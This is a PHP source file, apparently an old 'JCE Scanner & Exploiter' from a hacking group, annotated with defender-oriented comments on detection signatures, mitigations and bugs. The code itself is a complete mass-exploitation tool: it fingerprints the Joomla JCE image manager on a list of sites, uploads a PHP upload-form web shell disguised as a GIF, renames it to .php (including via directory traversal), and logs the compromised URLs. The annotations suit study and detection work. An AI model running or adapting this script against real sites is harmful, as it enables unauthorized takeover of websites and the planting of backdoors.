  1. <?php
  2.  
  3. /*
  4.  
  5.         JCE Scanner & Exploiter By Security Knights Team
  6.  
  7.          all rights reserved for s3c-k members
  8.  
  9.                  Home : http://s3c-k.com/vb/
  10. */
  11.  
      // Driver: reads one URL per line from the file named in argv[1], probes each
      // host with scan(), and, where scan() reports a hit, calls exploit() and logs
      // the URL it returns to jce_scanner_result.txt in the current directory.
      // Defender note: this is an automated mass-exploitation script aimed at the
      // JCE image manager. The result file name and the console strings below
      // ("[+] Scaning =>", "[?] Vulnerable :", "Done =>") are useful artefacts when
      // triaging a machine the script was run from.
  12. if (!isset ($argv[1]))
      // help() echoes the usage text and returns nothing, so die() only exits here.
  13.     die (help ());
  14.  
  15. if (!file_exists ($argv[1]))
  16.     die ("\"{$argv[1]}\" Not Found !\n");
  17.  
      // "@" hides read errors; an unreadable file yields a single empty "site".
      // Only "\n" is split on, so CRLF input leaves a trailing "\r" on every entry.
  18. $sites = explode ("\n", trim (@file_get_contents ($argv[1])));
  19.  
  20. echo "\n".count ($sites)." Website Loaded\n\n";
  21.  
      // fopen()'s return value is not checked; if it fails, every fwrite()/fclose()
      // below warns instead of writing. The banner written next mirrors help().
  22. $file = fopen ("jce_scanner_result.txt", "w");
  23. fwrite ($file, "        JCE Scanner & Exploiter By Security Knights Team
  24.  
  25.          all rights reserved for s3c-k members
  26.  
  27.                  Home : http://s3c-k.com/vb/\n\n");
  28.  
      // Per target: scan() decides "vulnerable" (see its docblock for how weak that
      // test is); exploit() returns the URL of the dropped file, or null on failure,
      // and the assignment-in-condition below relies on that truthiness.
  29. foreach ($sites as $site)
  30. {
  31.     echo "[+] Scaning => $site [+]\n";
  32.     echo "[?] Vulnerable : ";
  33.     if (scan ($site))
  34.     {
  35.         echo "Yes\n";
  36.         echo "[!] Result : ";
  37.         if ($result = exploit ($site))
  38.         {
  39.             echo "Done => $result\n\n";
  40.             fwrite ($file, $result."\n");
  41.         }
  42.         else
  43.             echo "Exploit Failed\n\n";
  44.     }
  45.     else
  46.         echo "No\n\n";
  47. }
  48.  
  49. fclose ($file);
  50. echo "\n";
  51.  
      /**
       * Fingerprints the JCE image manager by fetching its plugin manifest.
       *
       * The request always goes to the host's document root; any path component
       * of $site is ignored here (exploit() does honour it), so installs under a
       * sub-directory are never detected.
       *
       * The captured version string ($version) is never inspected: any response
       * containing a <version> element counts as "vulnerable", so fully patched
       * installs -- and any page that merely echoes that tag -- are reported as
       * hits. send() returns null when the connection fails; preg_match() then
       * sees an empty subject and the function returns false.
       *
       * Detection: a plain-HTTP/1.0 GET for
       * /plugins/editors/jce/tiny_mce/plugins/imgmanager/imgmanager.xml with the
       * bare User-Agent "Mozilla" is a stable signature of this scanner.
       * Mitigation: keep JCE current and deny direct web access to plugin
       * manifest files.
       *
       * @param string $site  URL (or bare host name) of the target
       * @return bool
       */
  52. function scan ($site)
  53. {
  54.     $host = parse_url ($site, PHP_URL_HOST);
  55.     $packet = "GET /plugins/editors/jce/tiny_mce/plugins/imgmanager/imgmanager.xml HTTP/1.0\r\n";
  56.     $packet .= "Host: $host\r\n";
  57.     $packet .= "User-Agent: Mozilla\r\n\r\n";
  58.  
  59.     $imgmanager = send ($host, $packet);
      // Only the presence of the tag matters; $version is captured and discarded.
  60.     if (preg_match ("/<version>(.*)<\/version>/", $imgmanager, $version))
  61.     {
  62.         return true;
  63.     }
  64.     return false;
  65. }
  66.  
      /**
       * Tries to drop a PHP upload form on the target through the JCE image
       * manager's upload action, then locates it and renames it to a .php file.
       *
       * Flow as written:
       *   1. POST a hand-built multipart body (fixed boundary ending 41184676334)
       *      whose "Filedata" part is named s3c-k.gif but consists of a "GIF89a"
       *      header followed by the $uploader PHP source (an unauthenticated
       *      file-upload form).
       *   2. GET the file back from /images/stories/ (or, failing that, /images/)
       *      and look for the word "Upload" -- which $uploader contains -- to
       *      confirm it landed.
       *   3. Call json_rename_folder() to rename the .gif to s3c-k.php, first in
       *      place and then (stories branch only) two directories up via "../../".
       *   4. Return the URL of the renamed file; falls through with an implicit
       *      null when no branch succeeds, which the caller reports as failure.
       *
       * Inconsistencies a reader should know about: the verification GETs use
       * hard-coded root-relative paths while the returned URL is built from
       * $path and always uses "http://"; $path is concatenated directly to
       * "index.php", so a path without a trailing slash produces a wrong URL;
       * the Accept-Encoding header ends with a bare "\n"; Content-Length counts
       * $data only, yet an extra blank line precedes the body and "\r\n" follows it.
       *
       * Detection: the query string
       * option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload,
       * the fixed Cookie values (identical for every target), the boundary string
       * and the file name s3c-k.gif together form a stable signature; on disk,
       * look for s3c-k.gif / s3c-k.php under images/stories, images or the web
       * root. Mitigation: upgrade JCE, disallow PHP execution under the images
       * directory, and alert on renames that introduce ".php" or "../".
       *
       * @param string $site  target URL; its path component is used as the
       *                      Joomla base path (defaults to "/")
       * @return string|null  URL of the dropped file, or (implicit) null on failure
       */
  67. function exploit ($site)
  68. {
      // Payload: an HTML upload form plus the PHP that moves the uploaded file
      // next to the script. This is what is later searched for via "Upload".
  69.     $uploader = '<form enctype="multipart/form-data" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="512000" />File To Upload : <input name="userfile" type="file" /><input type="submit" value="Upload"/></form><?php $uploaddir = getcwd ()."/";$uploadfile = $uploaddir . basename ($_FILES[\'userfile\'][\'name\']);if (move_uploaded_file ($_FILES[\'userfile\'][\'tmp_name\'], $uploadfile)){echo "File was successfully uploaded.</br>";}else{echo "Upload failed";}?>';
  70.  
      // Upload directory sent in the "upload-dir" part and reused for renames.
  71.     $dir = "/";
  72.  
  73.     $host = parse_url ($site, PHP_URL_HOST);
  74.     $path = parse_url ($site, PHP_URL_PATH);
  75.     if (!$path)
  76.         $path = "/";
  77.  
      // Multipart body: an empty "Filedata" part, then the real one with a GIF
      // signature ahead of the PHP source so naive type checks see an image.
  78.     $data    = "-----------------------------41184676334\r\n";
  79.     $data   .= "Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n";
  80.     $data   .= "$dir\r\n";
  81.     $data   .= "-----------------------------41184676334\r\n";
  82.     $data   .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"\"\r\n";
  83.     $data   .= "Content-Type: application/octet-stream\r\n\r\n\r\n";
  84.     $data   .= "-----------------------------41184676334\r\n";
  85.     $data   .= "Content-Disposition: form-data; name=\"upload-overwrite\"\r\n\r\n";
  86.     $data   .= "0\r\n";
  87.     $data   .= "-----------------------------41184676334\r\n";
  88.     $data   .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"s3c-k.gif\"\r\n";
  89.     $data   .= "Content-Type: image/gif\r\n\r\n";
  90.     $data   .= "GIF89a\n$uploader\r\n";
  91.     $data   .= "-----------------------------41184676334\r\n";
  92.     $data   .= "0\r\n";
  93.     $data   .= "-----------------------------41184676334\r\n";
  94.     $data   .= "Content-Disposition: form-data; name=\"action\"\r\n\r\n";
  95.     $data   .= "upload\r\n";
  96.     $data   .= "-----------------------------41184676334--";
  97.  
      // Request line: $path is prepended verbatim, so it must end in "/".
  98.     /*:p by s3c-k team */$packet = "POST ".$path."index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload&140329-063531 HTTP/1.0\r\n";
  99.     $packet .= "Host: $host\r\n";
  100.     $packet .= "User-Agent: Mozilla\r\n";
  101.     $packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*\/*;q=0.8\r\n";
  102.     $packet .= "Accept-Language: en-us,en;q=0.5\r\n";
  103.     $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
  104.     $packet .= "Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n";
       // Cookie is a fixed literal, never obtained from the target -- a fingerprint.
  105.     $packet .= "Cookie: 6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743; jce_imgmanager_dir=%2F; __utma=216871948.2116932307.1317632284.1317632284.1317632284.1; __utmb=216871948.1.10.1317632284; __utmc=216871948; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)\r\n";
       // Bare "\n" terminator: malformed header line.
  106.     $packet .= "Accept-Encoding: deflate\n";
  107.     $packet .= "Connection: Close\r\n";
  108.     $packet .= "Proxy-Connection: close\r\n";
       // Three CRLFs here: header terminator plus one surplus blank line before the body.
  109.     $packet .= "Content-Length: ".strlen ($data)."\r\n\r\n\r\n";
  110.     $packet .= $data;
  111.     $packet .= "\r\n";
  112.  
       // Upload response is discarded; success is inferred by re-fetching the file.
  113.     send ($host, $packet);
  114.  
       // Branch 1: file landed under /images/stories/.
  115.     if (preg_match ("/Upload/", send ($host, "GET /images/stories/s3c-k.gif HTTP/1.0\r\nHost: $host\r\nUser-Agent: Mozilla\r\n\r\n")))
  116.     {
  117.         json_rename_folder ($site, $dir."s3c-k.gif", "s3c-k.php");
  118.         if (preg_match ("/Upload/", send ($host, "GET /images/stories/s3c-k.php HTTP/1.0\r\nHost: $host\r\nUser-Agent: Mozilla\r\n\r\n")))
  119.             return "http://$host".$path."images/stories/s3c-k.php";
  120.         else
  121.         {
       // Second attempt renames with "../../", i.e. a traversal into the web root.
  122.             json_rename_folder ($site, $dir."s3c-k.gif", "../../s3c-k.php");
  123.             if (preg_match ("/Upload/", send ($host, "GET /s3c-k.php HTTP/1.0\r\nHost: $host\r\nUser-Agent: Mozilla\r\n\r\n")))
  124.                 return "http://$host".$path."s3c-k.php";
  125.         }
  126.     }
  127.     else
  128.     {
       // Branch 2: file landed directly under /images/.
  129.         if (preg_match ("/Upload/", send ($host, "GET /images/s3c-k.gif HTTP/1.0\r\nHost: $host\r\nUser-Agent: Mozilla\r\n\r\n")))
  130.         {
  131.             json_rename_folder ($site, $dir."s3c-k.gif", "s3c-k.php");
  132.             if (preg_match ("/Upload/", send ($host, "GET /images/s3c-k.php HTTP/1.0\r\nHost: $host\r\nUser-Agent: Mozilla\r\n\r\n")))
  133.                 return "http://$host".$path."images/s3c-k.php";
  134.         }
  135.     }
       // No explicit return here: null is returned when every check above failed.
  136. }
  137.  
       /**
        * Issues the image manager's JSON "folderRename" call to rename $old to $new.
        *
        * $old and $new are interpolated into the JSON body without any escaping;
        * the callers pass fixed names, but a value containing a double quote would
        * produce an invalid message. The Content-Type claims form-urlencoded while
        * the body is "json=" followed by raw, unencoded JSON; the Accept-Encoding
        * line ends with a bare "\n"; and the Cookie header is a fixed literal whose
        * "utmcmd=(none)" value appears to contain an invisible zero-width
        * character -- keep that line byte-for-byte as is. The response from send()
        * is discarded, so success is never confirmed here; exploit() re-fetches
        * the file instead.
        *
        * Detection: a POST to index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager
        * carrying "X-Request: JSON" and a body containing "folderRename" whose
        * second argument ends in ".php" or starts with "../" (both appear in
        * exploit()) is characteristic of this tool.
        *
        * @param string $site  target URL; its path component becomes the base path
        * @param string $old   existing name relative to the image directory
        * @param string $new   new name; may contain "../" (see exploit())
        * @return void
        */
  138. function json_rename_folder ($site, $old, $new)
  139. {
  140.     $host = parse_url ($site, PHP_URL_HOST);
  141.     $path = parse_url ($site, PHP_URL_PATH);
  142.     if (!$path)
  143.         $path = "/";
  144.  
       // Raw string interpolation into JSON -- no escaping of $old/$new.
  145.     $rename = "json={\"fn\":\"folderRename\",\"args\":[\"$old\",\"$new\"]}";
  146.  
       // $path is prepended verbatim, so it must end in "/".
  147.     $packet = "POST ".$path."index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager HTTP/1.0\r\n";
  148.     $packet .= "Host: $host\r\n";
  149.     $packet .= "User-Agent: Mozilla\r\n";
  150.     $packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
  151.     $packet .= "Accept-Language: en-US,en;q=0.8\r\n";
  152.     $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
  153.     $packet .= "Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n";
       // Bare "\n" terminator: malformed header line.
  154.     $packet .= "Accept-Encoding: deflate\n";
  155.     $packet .= "X-Request: JSON\r\n";
       // Fixed cookie literal (contains an invisible character inside "(none)").
  156.     $packet .= "Cookie: __utma=216871948.2116932307.1317632284.1317639575.1317734968.3; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(non​e); __utmb=216871948.20.10.1317734968; __utmc=216871948; jce_imgmanager_dir=%2F; 6bc427c8a7981f4fe1f5ac65c1246b5f=7df6350d464a1bb4205f84603b9af182\r\n";
  157.     $packet .= "Content-Length: ".strlen ($rename)."\r\n\r\n";
  158.     $packet .= $rename."\r\n\r\n";
  159.  
       // Response discarded: the caller cannot tell whether the rename happened.
  160.     send ($host, $packet);
  161. }
  162.  
       /**
        * Sends a raw request to $host on TCP port 80 and returns the whole response.
        *
        * Plain sockets only: an https:// target is still contacted on port 80 (the
        * scheme is never inspected), so TLS-only hosts fail silently. The "@" hides
        * connection errors and the errno/errstr outputs ($x, $y) are discarded;
        * the connect timeout is 3 seconds, while the read loop runs until EOF under
        * the stream's default timeout. Returns null (implicitly) when the socket
        * cannot be opened -- callers feed the result to preg_match(), which then
        * simply fails to match.
        *
        * @param string $host  host name or IP address
        * @param string $data  complete request bytes, headers and body included
        * @return string|null
        */
  163. function send ($host, $data)
  164. {
  165.     if ($connection = @fsockopen ($host, 80, $x, $y, 3))
  166.     {
  167.         $response = "";
  168.         fputs ($connection, $data);
       // Accumulate until the server closes the connection (HTTP/1.0 semantics).
  169.         while (!feof ($connection))
  170.             $response .= fgets ($connection);
  171.         fclose ($connection);
  172.         return $response;
  173.     }
       // Connection failure falls through and returns null.
  174. }
  175.  
       /**
        * Prints the usage banner to stdout. Returns nothing, so die(help()) at the
        * top of the script exits right after the banner has been echoed.
        *
        * The third echo's string is mis-encoded (UTF-8 block-drawing characters
        * read back as Latin-1 and re-encoded); it is a runtime string and is left
        * untouched here.
        */
  176. function help ()
  177. {
       // $argv is read from global scope to show the script name in the usage line.
  178.     global $argv;
  179.     echo "\n\n\t\t\t     ,-*'^'~*-.,_,.-*~ Security Knights Team ~*-.,_,.-*~'^'*-,\n\n";
  180.     echo "\t\t\t\t\t   Home : http://s3c-k.com/vb/\n\n";
       // Mojibake banner; see docblock.
  181.     echo "\t\t\t\t▁ â–‚ â–„ â–… â–† â–‡ â–ˆ JCE Scanner & Exploiter â–ˆ â–‡ â–† â–… â–„ â–‚ ▁";
  182.     echo "\n\n\t\t\t\t\tUsage : php {$argv[0]} sites.txt\n\n";
  183. }
  184.  
  185. ?>